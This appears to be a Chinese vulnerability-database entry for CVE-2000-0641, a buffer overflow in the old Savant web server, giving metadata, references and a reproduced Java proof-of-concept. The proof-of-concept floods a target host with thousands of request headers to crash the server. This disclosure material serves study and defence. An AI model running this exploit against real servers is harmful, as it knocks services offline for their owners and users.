Savant web服务器任意命令执行漏洞

Savant web服务器任意命令执行漏洞

漏洞ID 1105924 漏洞类型 未知
发布时间 2000-07-03 更新时间 2005-05-02
图片[1]-Savant web服务器任意命令执行漏洞-安全小百科CVE编号 CVE-2000-0641
图片[2]-Savant web服务器任意命令执行漏洞-安全小百科CNNVD-ID CNNVD-200007-017
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/20066
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200007-017
|漏洞详情
Savantweb服务器存在漏洞。远程攻击者可以借助超长GET请求来执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/1453/info

A buffer overflow exists in the Savant Web Server. It is possible to exploit this overflow by sending an unusually long GET request to the server.


/* The MDMA Crew's proof-of-concept code for the buffer overflow in Savant
 * Written by Wizdumb <[email protected] || www.mdma.za.net/fk>
 *
 * The overflow occurs when the server recieves too many headers in the GET
 * request. The results of the attack look something like...
 *
 * SAVANT caused an invalid page fault
 * in module KERNEL32.DLL at 015f:bff87eb5.
 *
 * Registers:
 *
 * EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010212
 * EBX=0119ff90 SS=0167 ESP=0109ffc4 EBP=010a0030
 * ECX=010a01e4 DS=0167 ESI=8162f198 FS=20f7
 * EDX=bff76859 ES=0167 EDI=010a020c GS=0000
 *
 * Bytes at CS:EIP:
 * 53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75
 *
 * Stack dump:
 *
 * Enjoy!
 * Andrew Lewis aka. Wizdumb [03/07/2000]
 */

import java.io.*;
import java.net.*;

class savantstack {

 public static void main(String[] args) throws IOException {
   
   if (args.length != 1) {
     System.out.println("Syntax: java savantstack [hostname/ip]");
     System.exit(1); }
   
   Socket soq = null;
   PrintWriter white = null;
   
   int i = 5000; // This should do fine :-)
   
   soq = new Socket(args[0], 80);
   white = new PrintWriter(soq.getOutputStream(), true);
   
   System.out.print("Showing " + args[0] + " the phj33r :P ...");
   white.print("GET /index.html HTTP/1.0");
   for (int x = 0; x < i; x++) white.println("A:A");
   white.println("n");
   System.out.println("Done!");
   
   white.close();
   soq.close(); } }
|参考资料

来源:XF
名称:savant-get-bo
链接:http://xforce.iss.net/static/4901.php
来源:BID
名称:1453
链接:http://www.securityfocus.com/bid/1453
来源:BUGTRAQ
名称:20000708gnu-pop3d(FTGateproblem),SavantWebserver,GuildFTPd
链接:http://archives.neohapsis.com/archives/bugtraq/2000-07/0114.html

相关推荐: Htgrep CGI查询读取任意文件漏洞

Htgrep CGI查询读取任意文件漏洞 漏洞ID 1206242 漏洞类型 未知 发布时间 2000-11-14 更新时间 2000-11-14 CVE编号 CVE-2000-0832 CNNVD-ID CNNVD-200011-046 漏洞平台 N/A C…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享